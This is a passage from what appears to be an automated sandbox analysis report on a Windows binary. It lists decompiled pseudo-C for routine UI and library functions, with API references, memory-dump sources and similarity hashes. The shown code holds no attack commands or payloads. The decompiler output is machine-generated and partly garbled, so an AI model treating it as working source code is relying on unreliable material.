                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                • String ID: lu@
                                                                                • API String ID: 902310565-2585274229
                                                                                • Opcode ID: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction ID: 1868f2d57648088d78e42551569d2a182e29cfcd79893dd67f987c243af7d502
                                                                                • Opcode Fuzzy Hash: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction Fuzzy Hash: BD411730900658DFDB60DF64CC81BDAB7F4AB49304F4144EAE508AB295D778AE84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004489F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E004489F4(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x487bf0; // 0x2290e50
					E00425F8C(_t34,  &_v24);
					_push(_t69);
					_push(0x448af2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E004486F8(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x448af9);
							_t40 =  *0x487bf0; // 0x2290e50
							return E00425F84(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x487bf0; // 0x2290e50
					E00425F8C(_t42,  &_v8);
					_push(_t69);
					_push(0x448ac7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E004488A0( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x448ace);
					_t48 =  *0x487bf0; // 0x2290e50
					return E00425F84(_t48);
				}
				L14:
			}


















                                                                                0x004489f5
                                                                                0x004489f7
                                                                                0x004489fb
                                                                                0x004489fd
                                                                                0x00448a07
                                                                                0x00448a10
                                                                                0x00448b0f
                                                                                0x00448a16
                                                                                0x00448a20
                                                                                0x00448a22
                                                                                0x00448a22
                                                                                0x00448a32
                                                                                0x00448a34
                                                                                0x00448a34
                                                                                0x00448a3e
                                                                                0x00448a40
                                                                                0x00448a40
                                                                                0x00448a4c
                                                                                0x00448a52
                                                                                0x00448a57
                                                                                0x00448a5e
                                                                                0x00448a5f
                                                                                0x00448a64
                                                                                0x00448a67
                                                                                0x00448a6a
                                                                                0x00448a6a
                                                                                0x00448a7c
                                                                                0x00448a83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00448ad2
                                                                                0x00448adc
                                                                                0x00448adf
                                                                                0x00448ae2
                                                                                0x00448ae7
                                                                                0x00448af1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00448ad2
                                                                                0x00448a88
                                                                                0x00448a8d
                                                                                0x00448a94
                                                                                0x00448a95
                                                                                0x00448a9a
                                                                                0x00448a9d
                                                                                0x00448aac
                                                                                0x00448ab1
                                                                                0x00448ab4
                                                                                0x00448ab7
                                                                                0x00448abc
                                                                                0x00448ac6
                                                                                0x00448ac6
                                                                                0x00000000

                                                                                APIs
                                                                                • GetKeyState.USER32(00000010), ref: 00448A18
                                                                                • GetKeyState.USER32(00000011), ref: 00448A2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID:
                                                                                • API String ID: 1649606143-3916222277
                                                                                • Opcode ID: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction ID: 2f67ee1c30486cca61a85eaf8b30acdb55de4a75bb1a0bb337f63a262a7cdb16
                                                                                • Opcode Fuzzy Hash: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction Fuzzy Hash: 5931E534A04348EFEB11DBA5D85569DB7F5EB48708F5584BFE800B7291EBB85A00C758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424428, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00424428(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403584(1);
				_push(_t77);
				_push(0x4244af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x4120e4; // 0x412130
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x487a44);
				L00406840();
				_push(_t77);
				_push(0x42450f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00422EBC( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00422EB8(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424516);
				_push(0x487a44);
				L00406988();
				return 0;
			}












                                                                                0x00424429
                                                                                0x0042442b
                                                                                0x00424435
                                                                                0x00424444
                                                                                0x00424449
                                                                                0x0042444a
                                                                                0x0042444f
                                                                                0x00424452
                                                                                0x00424458
                                                                                0x0042445e
                                                                                0x00424471
                                                                                0x00424471
                                                                                0x00424479
                                                                                0x00424483
                                                                                0x0042448e
                                                                                0x0042448e
                                                                                0x00424494
                                                                                0x004244a2
                                                                                0x004244a7
                                                                                0x004244aa
                                                                                0x004244c6
                                                                                0x004244cb
                                                                                0x004244d2
                                                                                0x004244d3
                                                                                0x004244d8
                                                                                0x004244db
                                                                                0x004244e4
                                                                                0x004244ef
                                                                                0x004244f2
                                                                                0x004244f9
                                                                                0x004244fc
                                                                                0x004244ff
                                                                                0x00424504
                                                                                0x00424509
                                                                                0x0042450e

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A44,00000000,?,?), ref: 004244CB
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A44,00424516,00487A44,00000000,?,?), ref: 00424509
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID: 0!A
                                                                                • API String ID: 3168844106-1450072167
                                                                                • Opcode ID: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction ID: 58ae4afe19b813cdd8764f3c44f7d698b9faef3fda2e75d9dafaa0c865d1a70e
                                                                                • Opcode Fuzzy Hash: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction Fuzzy Hash: 9421A175A04304AFC701DF69D89198DBBF5FB4C720B6281AAE804A7751C674EE80CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00435A5C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00435A5C(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00413FA4(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435040(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                                0x00435a65
                                                                                0x00435a72
                                                                                0x00435a85
                                                                                0x00435a89
                                                                                0x00435ad9
                                                                                0x00435ad9
                                                                                0x00435a8b
                                                                                0x00435a8b
                                                                                0x00435a8b
                                                                                0x00435a95
                                                                                0x00435a9b
                                                                                0x00000000
                                                                                0x00435aa3
                                                                                0x00435aa8
                                                                                0x00435abc
                                                                                0x00435ad3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00435ad3
                                                                                0x00000000
                                                                                0x00435ad5
                                                                                0x00435ad5
                                                                                0x00000000
                                                                                0x00435a8b
                                                                                0x00435add
                                                                                0x00435ae6

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$EqualIntersect
                                                                                • String ID: @
                                                                                • API String ID: 3291753422-2766056989
                                                                                • Opcode ID: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction ID: a4dc38a6c8dfb3a5b63c1f0ba833f3846fe2b2ebe5734ae6dc21ff9bf713c91f
                                                                                • Opcode Fuzzy Hash: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction Fuzzy Hash: 95118C31A046489BC701EA6DC894BDF7BEC9F48318F0402A6FD04EB382D779DD058794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044C690, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E0044C690(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				char _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v8 = 0;
				_t23 =  *0x46bb24; // 0x0
				_v12 = _t23;
				_t24 =  *0x46bb30; // 0x0
				_v16 = _t24;
				 *0x46bb24 = __eax;
				 *0x46bb30 = 0;
				_push(_t30);
				_push(0x44c733);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(_t30);
				_push(0x44c6fc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(0);
				_push(E0044C640);
				_push(GetCurrentThreadId());
				L00406DA8();
				_t12 =  *0x46bb30; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x44c73a);
				_t5 =  &_v16; // 0x42ea72
				 *0x46bb30 =  *_t5;
				_t16 = _v12;
				 *0x46bb24 = _t16;
				return _t16;
			}















                                                                                0x0044c691
                                                                                0x0044c693
                                                                                0x0044c69b
                                                                                0x0044c69e
                                                                                0x0044c6a4
                                                                                0x0044c6a7
                                                                                0x0044c6ad
                                                                                0x0044c6b0
                                                                                0x0044c6b7
                                                                                0x0044c6be
                                                                                0x0044c6bf
                                                                                0x0044c6c4
                                                                                0x0044c6c7
                                                                                0x0044c6cc
                                                                                0x0044c6cd
                                                                                0x0044c6d2
                                                                                0x0044c6d5
                                                                                0x0044c6d8
                                                                                0x0044c6da
                                                                                0x0044c6e4
                                                                                0x0044c6e5
                                                                                0x0044c6ea
                                                                                0x0044c6ef
                                                                                0x0044c6f4
                                                                                0x0044c6f7
                                                                                0x0044c717
                                                                                0x0044c71a
                                                                                0x0044c71d
                                                                                0x0044c722
                                                                                0x0044c725
                                                                                0x0044c72a
                                                                                0x0044c72d
                                                                                0x0044c732

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0044C6DF
                                                                                • 72E7AC10.USER32(00000000,0044C640,00000000,00000000,0044C6FC,?,00000000,0044C733), ref: 0044C6E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID: rB
                                                                                • API String ID: 2882836952-3432471736
                                                                                • Opcode ID: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction ID: 784cd37228573f0c4d139dee04941cc700bad5c37d42a676d98ffa6d26d47428
                                                                                • Opcode Fuzzy Hash: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction Fuzzy Hash: C801C4B4A05704AFE301CF65DC51916BBF8EB8DB10B628476E800D3B60F7746400CE5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042641C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0042641C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x487abf != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x487aa0; // 0x42641c
					 *0x487aa0 = E00426184(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x487aa0(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                                0x00426422
                                                                                0x0042642c
                                                                                0x00426456
                                                                                0x0042645f
                                                                                0x00426487
                                                                                0x00426487
                                                                                0x00426461
                                                                                0x00426461
                                                                                0x00426466
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00426466
                                                                                0x0042642e
                                                                                0x00426433
                                                                                0x00426440
                                                                                0x00426452
                                                                                0x00426452
                                                                                0x00426492

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 0042646A
                                                                                • GetSystemMetrics.USER32 ref: 0042647C
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromPoint
                                                                                • API String ID: 1792783759-1072306578
                                                                                • Opcode ID: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction ID: cd85fc9c8645eeba43d65e48dc59c82577749165faf05199f4873ef963c6ea0d
                                                                                • Opcode Fuzzy Hash: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction Fuzzy Hash: 2F01A231305224AFDB006F51EC84B5FBB55EB40758F91442AF9598B612C375DE40C7AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004262F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E004262F4(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x487abe != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x487a9c; // 0x4262f4
					 *0x487a9c = E00426184(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x487a9c(_t14, _t17);
				}
				return _t19;
			}












                                                                                0x004262fa
                                                                                0x004262fd
                                                                                0x00426307
                                                                                0x0042632c
                                                                                0x00426335
                                                                                0x0042635c
                                                                                0x0042635c
                                                                                0x00426309
                                                                                0x0042630e
                                                                                0x0042631b
                                                                                0x00426328
                                                                                0x00426328
                                                                                0x00426367

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00426345
                                                                                • GetSystemMetrics.USER32 ref: 00426351
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromRect
                                                                                • API String ID: 1792783759-4033241945
                                                                                • Opcode ID: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction ID: 2649c8152ff0a4a618a293e30726504c2b2cf717a0c2621c365be1b3126a70b4
                                                                                • Opcode Fuzzy Hash: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction Fuzzy Hash: E501A232B041249BDB10CB59FC85B1EB765E741764FA5846BEC08CB603C678DD40CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D724, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0043D724(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00442554(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043D788(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x43375c
						E0043D514(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x43375c
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L004260FC();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}








                                                                                0x0043d72d
                                                                                0x0043d732
                                                                                0x0043d734
                                                                                0x0043d73f
                                                                                0x0043d741
                                                                                0x0043d744
                                                                                0x0043d748
                                                                                0x0043d74f
                                                                                0x0043d756
                                                                                0x0043d75e
                                                                                0x0043d763
                                                                                0x0043d766
                                                                                0x0043d76a
                                                                                0x0043d76e
                                                                                0x0043d76f
                                                                                0x0043d777
                                                                                0x0043d779
                                                                                0x0043d779
                                                                                0x0043d744
                                                                                0x0043d782

                                                                                APIs
                                                                                  • Part of subcall function 0043D788: 734518F0.COMCTL32(?,00000000,0043D74D,00000000,00000000,00000000), ref: 0043D7A0
                                                                                  • Part of subcall function 0043D514: ClientToScreen.USER32(?,0043D7D0), ref: 0043D52C
                                                                                  • Part of subcall function 0043D514: GetWindowRect.USER32 ref: 0043D536
                                                                                • 73451850.COMCTL32(?,?,\7C,?,00000000,00000000,00000000), ref: 0043D76F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 73451873451850ClientRectScreenWindow
                                                                                • String ID: \7C$\7C
                                                                                • API String ID: 1718620977-1242633874
                                                                                • Opcode ID: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction ID: a175693acc41a737ad07227ac984dcca9a23f6f09638294ce6bc0965f6750621
                                                                                • Opcode Fuzzy Hash: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction Fuzzy Hash: 9DF04F76B00209AB8B10DEAE98C18AEF3ACAB4C214B00817AF918D3301D675ED058B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00433464, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00433464(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E0043341C(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}





                                                                                0x00433465
                                                                                0x0043346f
                                                                                0x00433473
                                                                                0x00433475
                                                                                0x00433486
                                                                                0x0043348a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043348a
                                                                                0x00433475
                                                                                0x0043348c
                                                                                0x0043348f

                                                                                APIs
                                                                                • WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 0043341C: GlobalFindAtomA.KERNEL32 ref: 00433430
                                                                                  • Part of subcall function 0043341C: GetPropA.USER32 ref: 00433447
                                                                                • GetParent.USER32(00000000), ref: 00433481
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                                • String ID: M3C
                                                                                • API String ID: 3524704154-2629677723
                                                                                • Opcode ID: 98702e36936e0e1a5cccc6fada8a93c2d553a3460fb0d51efd6170255a84fd1d
                                                                                • Instruction ID: faf4f0c274cddd3732b65d19d4330b845a9b5ea9ebc25192a453e9e8282a3d01
